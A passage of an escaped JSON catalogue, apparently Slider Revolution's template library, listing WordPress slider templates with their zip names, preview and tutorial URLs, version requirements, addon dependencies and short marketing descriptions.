but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:18:48\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"645\":{\"id\":\"690\",\"title\":\"Architecture Process\",\"alias\":\"architecture-process\",\"zip\":\"packs\\/architecture-process.zip\",\"uid\":\"df6202f061079192fde61c7756624c6c\",\"img\":\"architecture-process\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:20:31\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"646\":{\"id\":\"691\",\"title\":\"Architecture Portfolio\",\"alias\":\"architecture-portfolio\",\"zip\":\"packs\\/architecture-portfolio.zip\",\"uid\":\"444b7a502897a53a16eea5ec3cb7f08c\",\"img\":\"architecture-portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:22:15\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"647\":{\"id\":\"692\",\"title\":\"Architecture Portfolio Modal\",\"alias\":\"architecture-portfolio-modal\",\"zip\":\"packs\\/architecture-portfolio-modal.zip\",\"uid\":\"59994ba13c87a5409d75fdcbc7f58005\",\"img\":\"architecture-portfolio-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:23:38\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"648\":{\"id\":\"693\",\"title\":\"Architecture Contact\",\"alias\":\"architecture-contact\",\"zip\":\"packs\\/architecture-contact.zip\",\"uid\":\"b1ff4cf0d6530d79f7d67540ffdcd98d\",\"img\":\"architecture-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/architecture-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=architecture-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The architecture website template offers a modern, visually appealing one-page layout with flexible customization options. This is not just a real estate website, but can also fit for any other kind of theme!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-10-06 13:25:49\",\"package\":\"Architecture Website Template Package\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Beautiful Way to Showcase Your Best Work for Prospective Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-beautiful-way-to-showcase-your-best-work-for-prospective-clients\\/\",\"guide_img\":\"tutorial\\/Architecture-Website-Template.png\",\"active\":\"1\",\"package_id\":\"59\",\"installed\":false},\"649\":{\"id\":\"694\",\"title\":\"Image Comparison Slider\",\"alias\":\"image-comparison-slider\",\"zip\":\"image-comparison-slider.zip\",\"uid\":\"c5af5832be50fc581c3a5ae31b09e5ab\",\"img\":\"image-comparison-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/image-comparison-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=image-comparison-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.7\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Create amazing before and after animations for your website with the image comparison slider template. We made sure to include multiple exciting examples for you to customize to your liking.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-beforeafter-addon\\\\\\/revslider-beforeafter-addon.php\\\",\\\"name\\\":\\\"Before After AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-11-18 11:13:19\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Boost Interactions with a Before-and-After Image Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/boost-interactions-with-a-before-and-after-image-slider\\/\",\"guide_img\":\"tutorial\\/image-comparison-slider.png\",\"active\":\"1\",\"installed\":false},\"650\":{\"id\":\"695\",\"title\":\"Wedding Photo Slider Template Package\",\"alias\":\"wedding-photo-slider-template-package\",\"zip\":\"\",\"uid\":\"wedding-photo-slider-template-package\",\"img\":\"packages\\/Wedding-Photo-Slider-Package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wedding-photo-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wedding-photo-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.7\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">This WordPress photo slider template offers many interesting features to elevate your photography website. The main slider rotates through your photo highlights and a click of the button reveals a lightbox carousel with masonry layout. <\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-11-18 11:19:04\",\"package\":\"Wedding Photo Slider Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Create a Beautiful Photo Slider for Your Personal Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/create-a-beautiful-photo-slider-for-your-personal-website\\/\",\"guide_img\":\"tutorial\\/Wedding-Photo-Slider.png\",\"active\":\"1\",\"package_id\":\"60\",\"installed\":false},\"651\":{\"id\":\"696\",\"title\":\"Wedding Photo Slider\",\"alias\":\"wedding-photo-slider\",\"zip\":\"packs\\/wedding-photo-slider.zip\",\"uid\":\"490b30ad46586bbf7034e50651b248a7\",\"img\":\"wedding-photo-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wedding-photo-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wedding-photo-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.7\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This WordPress photo slider template offers many interesting features to elevate your photography website. The main slider rotates through your photo highlights and a click of the button reveals a lightbox carousel with masonry layout.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-11-18 11:24:38\",\"package\":\"Wedding Photo Slider Template Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Create a Beautiful Photo Slider for Your Personal Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/create-a-beautiful-photo-slider-for-your-personal-website\\/\",\"guide_img\":\"tutorial\\/Wedding-Photo-Slider.png\",\"active\":\"1\",\"package_id\":\"60\",\"installed\":false},\"652\":{\"id\":\"697\",\"title\":\"Wedding Photo Slider Modal\",\"alias\":\"wedding-photo-slider-modal\",\"zip\":\"packs\\/wedding-photo-slider-modal.zip\",\"uid\":\"56b40b3a73b786f5320f8814cddd3fda\",\"img\":\"wedding-photo-slider-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wedding-photo-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wedding-photo-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.7\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This WordPress photo slider template offers many interesting features to elevate your photography website. The main slider rotates through your photo highlights and a click of the button reveals a lightbox carousel with masonry layout.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-11-18 11:27:53\",\"package\":\"Wedding Photo Slider Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"Create a Beautiful Photo Slider for Your Personal Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/create-a-beautiful-photo-slider-for-your-personal-website\\/\",\"guide_img\":\"tutorial\\/Wedding-Photo-Slider.png\",\"active\":\"1\",\"package_id\":\"60\",\"installed\":false},\"653\":{\"id\":\"698\",\"title\":\"Travel Agency Card Slider\",\"alias\":\"destinations-card-slider\",\"zip\":\"destinations-card-slider.zip\",\"uid\":\"59af2d3ac72375f6764f224d93d600ac\",\"img\":\"destinations-card-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/travel-agency-card-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=travel-agency-card-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.7\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The destination of your travel blog or travel booking website, definitely is \\\"above & beyond\\\" with this tastefully modern card slider template for Slider Revolution.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-11-18 11:31:52\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Make Your Product Comparison Pages More Attractive and Trustworthy [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-make-your-product-comparison-pages-more-attractive-and-trustworthy\\/\",\"guide_img\":\"tutorial\\/destinations-card-slider.png\",\"active\":\"1\",\"installed\":false},\"654\":{\"id\":\"699\",\"title\":\"Kitchen Knives Product Slider\",\"alias\":\"knives-product-slider\",\"zip\":\"knives-product-slider.zip\",\"uid\":\"b1d2db8fcd3e6bb1e949d00c90fd6ec0\",\"img\":\"knives-product-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/kitchen-knives-product-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=kitchen-knives-product-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.7\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Even if you\'re not into the knives selling business, this product slider template is easily customized to fit any use-case. The beautifully animated parallax elements, can be replaced with your own .png\'s, in no time!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-11-18 11:34:48\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Promote Subscription Boxes with a Unique Product Slider Design [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-promote-subscription-boxes-with-a-unique-product-slider-design\\/\",\"guide_img\":\"tutorial\\/knives-product-slider.png\",\"active\":\"1\",\"installed\":false},\"655\":{\"id\":\"700\",\"title\":\"Tiny Slider Dark\",\"alias\":\"tiny-slider-dark\",\"zip\":\"tiny-slider-dark.zip\",\"uid\":\"57f5cd4e698621f5b7e09bc0bb172d72\",\"img\":\"tiny-slider-dark\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/event-booking-tiny-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-booking-tiny-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The Event Booking Tiny Slider is a compact and stylish way to promote your events on your website or social media. With this template, you can create a sleek and minimalistic slider featuring your upcoming events and booking information.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"slider\"],\"plugin_require\":null,\"date\":\"2022-12-20 13:51:32\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design an Event Booking Page That Sells More Tickets [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-an-event-booking-page-that-sells-more-tickets\\/\",\"guide_img\":\"tutorial\\/tiny-slider-dark.png\",\"active\":\"1\",\"installed\":false},\"656\":{\"id\":\"701\",\"title\":\"Tiny Slider Light\",\"alias\":\"tiny-slider-light\",\"zip\":\"tiny-slider-light.zip\",\"uid\":\"67e9640a0dd7ac7c04342a323abb054a\",\"img\":\"tiny-slider-light\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/event-booking-tiny-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-booking-tiny-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The Event Booking Tiny Slider is a compact and stylish way to promote your events on your website or social media. With this template, you can create a sleek and minimalistic slider featuring your upcoming events and booking information.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"slider\"],\"plugin_require\":null,\"date\":\"2022-12-20 13:56:22\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"657\":{\"id\":\"702\",\"title\":\"Pet Store Product Slider\",\"alias\":\"pet-store-product-slider\",\"zip\":\"pet-store-product-slider.zip\",\"uid\":\"6f847227958900311108951a77721e29\",\"img\":\"pet-store-product-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/pet-store-product-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=pet-store-product-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The Pet Store Product Slider template is a professional and eye-catching way to showcase your pet store\'s products on your website or social media. With this template, you can easily create a dynamic and interactive slider featuring your most popular pet products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-12-20 14:02:59\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design More Engaging Product Pages for eCommerce Websites [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-more-engaging-product-pages-for-ecommerce-websites\\/\",\"guide_img\":\"tutorial\\/pet-store-product-slider.png\",\"active\":\"1\",\"installed\":false},\"658\":{\"id\":\"703\",\"title\":\"Material UI Slider\",\"alias\":\"material-ui-slider\",\"zip\":\"material-ui-slider.zip\",\"uid\":\"7e7909a030545f80c8ba8101c5b9bbd7\",\"img\":\"material-ui-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/material-ui-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=material-ui-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The Material UI Slider Template is easy to use and requires no coding skills. You can quickly and easily create a professional-looking slider to showcase your products, services, or information in a visually appealing and engaging way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-thecluster-addon\\\\\\/revslider-thecluster-addon.php\\\",\\\"name\\\":\\\"Slider Revolution The Cluster AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-12-20 14:06:25\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Promote Your Digital Agency\\u2019s Services in a Unique Way [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-promote-your-digital-agency-s-services-in-a-unique-way\\/\",\"guide_img\":\"tutorial\\/material-ui-slider.png\",\"active\":\"1\",\"installed\":false},\"659\":{\"id\":\"704\",\"title\":\"Happy Holidays Hero\",\"alias\":\"happy-holidays-hero\",\"zip\":\"happy-holidays-hero.zip\",\"uid\":\"aabe32f963bc66d36f617c595ca2f1fd\",\"img\":\"happy-holidays-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/happy-holidays-hero\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=happy-holidays-hero\",\"version\":\"1.0.0\",\"required\":\"6.6.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Wish everyone happy holidays with our newest Christmas inspired hero section.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-12-22 09:27:59\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Hero Image Template to Use for Holidays and Sales [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-hero-image-template-to-use-for-holidays-and-sales\\/\",\"guide_img\":\"tutorial\\/happy-holidays-hero.png\",\"active\":\"1\",\"installed\":false},\"660\":{\"id\":\"705\",\"title\":\"Space & Sci-Fi Presentation Slider\",\"alias\":\"space-and-sci-fi-presentation-slider\",\"zip\":\"space-and-sci-fi-presentation-slider.zip\",\"uid\":\"6f8a89cfaa624a4ac799901fc85b802d\",\"img\":\"space-and-sci-fi-presentation-slider\\/slide1.png\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/space-sci-fi-presentation-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=space-sci-fi-presentation-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This is a perfect choice for technology companies, science fiction writers, space enthusiasts and much more.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-01-24 12:57:45\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Transport Your Visitors to Another Time or Place with Layered Images [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-transport-your-visitors-to-another-time-or-place-with-layered-images\\/\",\"guide_img\":\"tutorial\\/space-and-sci-fi-presentation-slider.png\",\"active\":\"1\",\"installed\":false},\"661\":{\"id\":\"706\",\"title\":\"Claymorphism Carousel\",\"alias\":\"Claymorphism-Carousel\",\"zip\":\"Claymorphism-Carousel.zip\",\"uid\":\"8faec9adf09737acd8efdad7a1ccb673\",\"img\":\"Claymorphism-Carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/claymorphism-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=claymorphism-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The Claymorphism Carousel template for Slider Revolution is a visually striking slider that features the unique claymorphism style.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\"],\"plugin_require\":null,\"date\":\"2023-01-24 13:01:22\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Space for Your Portfolio Highlight Reel [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-space-for-your-portfolio-highlight-reel\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"installed\":false},\"662\":{\"id\":\"707\",\"title\":\"404 Page Hero Collection\",\"alias\":\"404-page-hero-collection\",\"zip\":\"404-page-hero-collection.zip\",\"uid\":\"a614db3d61935fdf249d7de2ff1f2d8f\",\"img\":\"404-page-hero-collection\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/404-page-hero-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=404-page-hero-collection\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">With the 404 Page Hero Collection template for Slider Revolution, you have several creative solutions at your disposal, to make your 404 page shine!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-02-22 16:28:44\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"663\":{\"id\":\"708\",\"title\":\"Furniture Store 